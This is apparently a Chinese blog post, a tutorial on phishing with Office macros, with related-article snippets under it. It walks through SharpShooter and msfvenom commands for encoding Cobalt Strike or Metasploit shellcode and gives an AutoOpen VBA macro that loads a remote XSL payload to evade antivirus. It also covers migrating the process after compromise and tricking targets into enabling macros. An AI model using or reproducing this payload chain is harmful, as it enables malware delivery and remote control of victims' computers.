xsl 访问其他xml_加载远程XSL文件的宏免杀方法

最新推荐文章于 2023-10-07 17:02:21 发布
最新推荐文章于 2023-10-07 17:02:21 发布
阅读量527 收藏 2
点赞数
文章标签: xsl 访问其他xml

前言

打点越来越难了,社工钓鱼会是最常见的攻击手段,0day会是最有效的攻击手段,物理渗透会是危害最大的攻击手段。

在钓鱼攻击中木马的形式主要如下:

  • Office

  • DLL劫持

  • 假冒加固工具

  • 木马捆绑

通常办公软件Office具有最大的安装量,将文档插入邮件中已经是惯用的工作方式。但是Office常见的攻击方法:

  • 0day

  • 已知CVE漏洞

  • DDEAUTO

  • 注入执行命令

第一种方法直接跳过,已知的CVE漏洞特征太明显,免杀成本和技术含量太大了。DDEAUTO和注入执行命令直接被杀软限制的很死。最后只能靠宏了,虽然默认情况下,Office已经禁用所有宏,但仍会在打开Word文档的时候发出通知。

通过收集宏免杀的常用的方法和测试,发现加载远程 .xsl文件可以绕过国内常用的杀软360全家桶和火绒成功上线。

SharpShooter

通过收集和测试一些开源的宏免杀的项目,发现了一个很好的项目,国外一个安全团队写的钓鱼框架。其中一个工具就是可以生成一个VBA宏文件,这个宏文件会用XMLDOM去加载远程的 .xsl文件。

具体原理和利用分析见文章:

Macros and More with SharpShooter v2.0

更多的框架利用可以看项目介绍:

项目地址:https://github.com/mdsecactivebreach/SharpShooter

利用测试

生成payload.bin

首先我们可以用 CobaltStrike或者 Metasploit生成二进制格式的shellcode,即后缀为 bin的文件。

处理payload.bin

然后利用 msfvenom对 payload.bin,因为 SharpShooter要求shellcode中不能含有空字节。

msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x86 --platform windows -e x86/shikata_ga_nai -f raw -o shellcode-encoded.bin -b '\x00'

生成xsl和macro

如下命令生成 .xsl文件和 macro文件:

SharpShooter.py --stageless --dotnetver 2--payload macro --output foo --rawscfile shellcode-encoded.bin --com xslremote --awlurl http://192.168.0.104:80/foo.xsl

简单介绍一下上面的几个参数:

  • --dotnetver:为目标的.net版本,可选2或者4

  • --awlurl:为xsl存放地址

68fa9f9aaa914a77863d3945cba52a2a.png

生成的 foo.macro内容很简单,代码如下:

SubAuto_Open()

Set XML = CreateObject("Microsoft.XMLDOM")

XML.async= False

Set xsl = XML

xsl.Load"http://192.168.0.104:80/foo.xsl"

XML.transformNode xsl

EndSub

创建一个对象加载远程的xsl文件。如果需要使函数 Auto_Open()加到 AutoOpen()方法里,这样就可以在打开word文档时就能运行宏,具体代码如下:

SubAutoOpen()

Auto_Open

EndSub

SubAuto_Open()

Set XML = CreateObject("Microsoft.XMLDOM")

XML.async= False

Set xsl = XML

xsl.Load"http://192.168.0.104:80/foo.xsl"

XML.transformNode xsl

EndSub

foo.xsl文件为 SharpShooter处理后的shellcode。

6ae72e665eb76ae430078307354b2823.png

我们可以把 foo.xsl传到自己的vps或者公共下载网站,然后修改vba代码中的地址即可。再讲vba代码加到word或excel文档中即可。

进程迁移

office宏加载远程的 .xsl文件有个缺点就是,点击启用宏后word进程会崩掉,如word进程被结束了,Cobalt Strike或者Metasploit会掉线。所以我们要做的是,在目标上线的时候就自动迁移到其他进程上。

处理方法:

  • Cobalt Strike:通过插件实现上线后自动迁移进程,Beacon Handler Suite

  • Metasploit: 在设置监听的时候可以设置: setautorunscript migrate-N explorer.exe或setautorunscript-f

这样可以实现在word进程被关闭后,得到一个新的会话,即持久的控制目标。

演示视频

引导性处理

为了更好去引导目标启用宏可以如下处理:

第一步:进入开发工具,选择插入控件---其他控件---Microsoft RDP Client Control*

3feac9360f8a08593503b645fb636e2b.png

第二步:设置控件属性内的Sever为localhost StartConnection为1,即点开自启动

36f40b191899e8d6084e77b7ae4b31d8.png

第三步:插入vba代码

66fdf60f13b26b998a0f068038c4947d.png

设置完成后,启用宏的提示就变成了 部分活动内容已被禁用,启用内容。

16bb393c5b4c6ab0057b7afe21c8cc49.png

这样就更好的去引导目标启用宏了。

总结

站在巨人的肩膀上

以上的思路和方法是最近一个星期在 github、 twitter和国内外的安全网站论坛上收集和测试得到的结果。然后自己做的一个总结,有兴趣的师傅可以自己研究 SharpShooter这个项目,并关注我们的微信公众号,后续我们会继续分享一些思路和方法。

Reference

https://www.secquan.org/Discuss/1070836

https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/

https://github.com/mdsecactivebreach/SharpShooter

weixin_39853590
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
office ole com 查看_Office如何快速进行
weixin_39900676的博客
12-17 232
前言Office ,译自英文单词 Macro。是 Office 自带的一种高级脚本特性,通过 VBA 代码, 可以在 Office 中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中 的一些任务自动化。而病毒是一种寄存在文档或模板的中的计算机病毒。一旦打开这样 的文档,其中的就会被执行,于是病毒就会被激活,转移到计算机上,并驻留在 Normal 模板上。Vi...
xsl 访问其他xml_信也科技数据库访问中间件 DAS 揭秘
weixin_39793098的博客
11-25 60
DAS 简介DAS 是信也科技自研的数据库访问中间件,是集数据库管理,ORM,动态 SQL 构建和分库分表支持的一体化关系型数据库访问解决方案。看到这里,你一定会说少年啊!已经有了那么多 ORM 框架和分库分表组件,像 Hibernate,Mybatis,mycat,sharding jdbc,还有我们最爱的携程 DAL 可供选择,干嘛还要重复造轮子?答案很简单,这些工具都不好用!而 DAS 是我...
对抗-
最新发布
xiaoheizi的博客
10-07 1361
编译:csc.exe /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs。5..将原生态文件cs.doc和经过踩踏的文件cs_EvilClippy.doc上传到恶意文件评测平台。4.点击开发工具——新建 ——任意 名——的位置(之前新建的word文档)——创建。5.跳转到如下,将cs生成的代码写入——点击保存——取消。3.自定义功能区——勾选 开发工具——点击确定。
office钓鱼的制作
swordheart的博客
08-04 2869
office钓鱼的制作 由于国内近些年来,红蓝对抗的升级,各类hvv,重保,防守方上各种软,edr,防御手段层出不穷,不会真的是欲哭无泪,今天带来EvilClippy 恶意文档助手,对office进行处理,红队小菜鸡,还望大佬带飞。 通过cobalt strike生成payload 1.通过cs生成office木马 2.点击 copy macro 复制生成的代码 3.新建一个文档,点击 “开发工具 — Visual Basic” 4.双击 “ThisDocument” ,将原有
利用MHT类型,病毒
Sven的忘却日记
03-04 1938
首先使用Word创建一个利用代码弹MsgBox的样本,如下图: 保存内容后,另存为MHT格式文件 文件内容如下: 此时,再使用一些常用的ole分析工具,就识别不了这个类型了,比如正常的word文档可以使用压缩软件查看一些ole内部结构相关的数据 正常的word文档,使用7z查看 问题就在,如过把刚刚的2.mht 改成2.doc,完全不影响执行 ...
xml_caidan.rar_XML asp
09-22
1. **XML数据解析**:ASP可以使用DOM(Document Object Model)或SAX(Simple API for XML)等方法来解析XML文件,提取数据并进行处理。DOM将XML文件成一个树形结构,便于遍历和操作;SAX则是一种事件驱动的解析...
Java and XML(英文第三版)_java_xml_birdsolc_源码
10-01
7. **SOAP(Simple Object Access Protocol)**:SOAP是基于XML的网络协议,常用于Web服务,允许远程调用方法并交换结构化信息。 8. **JAX-RPC和JAX-WS**:这两者是Java中实现SOAP Web服务的关键技术,JAX-RPC是...
轻松搞定XML、XML、XML
03-11
XML,全称Extensible Markup Language,可扩展标记语言,是一种用于标记数据的标准化语言,它在IT领域中扮演着至关重要的角色,特别是在数据交换、配置文件、文档存储以及Web服务等方面。XML的设计目的是传输和存储...
XML网页制作彻底研究.7z
11-10
例如,SOAP(Simple Object Access Protocol)是基于XML的网络通信协议,用于在Web上进行远程方法调用。WSDL(Web Services Description Language)也是XML格式,用于描述Web服务及其接口。 本资料包可能涵盖了XML...
整合PHP和XML(CHM)
04-03
SAX(Simple API for XML)是事件驱动的解析器,适用于处理大型XML文件,因为它不将整个文档到内存中。相比之下,DOM(Document Object Model)解析器会将整个XML文件转换为一个树形结构,便于遍历和修改。 2. ...
CF鼠标文件.xml
08-10
多功能的一个文件
】————3、Excel 和 Metasploit 和
Fly_鹏程万里
03-07 930
这篇文章主要介绍以Excel文件体,生成meterpreter反向shell的不同方法。 简介 这篇文章会继续讨论反向shell和规避毒软件的方法。有兴趣的可以看我的前一篇文章。随着时间飞逝,以前一些很好的绕过毒软件的方法现在均已失效。所以,我必须找到一种新的方法来隐藏我的反向shell。让我们开始吧…… …古老而简单的方法可能是最好的… 通过SMB_Deliver开启一个me...
微软为阻止恶意软件侵害禁用Excel4.0、开源网站插件存在上万个安全漏洞|1月24日全球网络安全热点
qcloud_security的博客
01-24 4000
安全资讯报告 微软默认禁用Excel4.0以阻止恶意软件 微软已宣布Excel4.0(XLM)现在将默认禁用,以保护客户受恶意文档的侵害。 10月,该公司首次在Microsoft 365消息中心更新中透露,如果用户或管理员没有手动打开或关闭该功能,它将在所有租户中禁用XLM。 从2021年7月开始,Windows管理员还可以使用组策略和用户使用Excel信任中心的“启用VBA时启用XLM”设置来手动禁用此功能。 XLM(又名Excel4.0)是默认的Exc...
devenv.exe中发生未处理的microsoft_漏洞分析|Office中XLM格式漏洞绕过安全保护分析...
weixin_39693438的博客
11-23 343
事件背景近日,有安全研究员发现在Excel 4.0及以下版本中,Office有一种XLM格式,这种类型的已被Visual Basic forApplications(VBA)替代。但是,所有Microsoft Office版本仍支持XLM,并且可以将其添到SYLK文件中。SYMBolic LinK(SYLK)是1980年代微软的一种文件格式,主要用于在应用程序(尤其是电...
Cobalt-Strike Office利用与
weixin_48967543的博客
04-29 1644
1.打开Cobalt-Strike生产Office病毒。 首先需要设置监听器、因为钓鱼的目标比较单纯,在这里就不采用域前置技术。 然后使用攻击模块,生产Office病毒。 设置好监听器。 生成病毒 2.将病毒放入word 首先打开Word,在审阅中编辑: 创建新的: 将生成的病毒放入Microsoft Word目录下的ThisDocument,注意如果位置写错了很容易报错。 按下Ctrl+S,将文件保存为启用的Word文档,注意这里的作者需要修改,否则默认会使用账户名 此时带病毒的Wo.
vbs调用c++dll_利用wmic调用xsl文件的分析与利用以及细节的答疑
weixin_39821605的博客
12-06 242
Casey Smith@subTee在博客分享的一个技巧,使用wmic能够从本地或从URL调用XSL(可扩展样式表语言)脚本。这个发现很有用,不仅可以作为一种白名单绕过的方法,而且可以作为payload来使用(从URL调用XSL脚本,利用XSL执行exe、shellcode、powershell脚本)。本地简单的一个wmic.xsl文件内容如下:远程执行命令:wmic os get /FORMAT...
红蓝对抗钓鱼篇之从入门到放弃
xnxqwzy的博客
09-13 155
上一章讲到邮件服务器的搭建和使用,那么这章就具体讲解利用方式。在大型企业边界安全做的越来越好的情况下,不管是 APT 攻击还是红蓝对抗演练,钓鱼和水坑攻击被越来越多的应用。钓鱼往往需要技术的支撑,但本章只讲述钓鱼和些许技术,系列学习在后续讲解。
钓鱼篇-利用RLO隐藏exe&文件捆绑&office-远程模板上线CS
weixin_45701675的博客
11-26 1801
钓鱼篇-利用RLO隐藏exe&文件捆绑&office-远程模板上线CS
如何利用msxsl绕过AppLocker?
weixin_34235457的博客
09-13 268
本文讲的是如何利用msxsl绕过AppLocker?, 0x00 前言 Casey Smith@subTee在twitter分享的一个技巧,使用包含微软签名的msxsl.exe能够执行JScript代码,从而实现对Applocker的绕过。 如图 twitter地址如下: https://twitter.com/subTee/status/87761...
学习XSL —— 利用XML进行信息交换、检索与重用
为了解决这些问题,XML作为一种新型的标记语言应运而生。 XML借鉴了HTML、数据库和程序语言的优点,将内容和表现分开,使得信息的检索更方便,同时也为用户之间的资料交换提供了更多的灵活性。它拥有比HTML更大的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值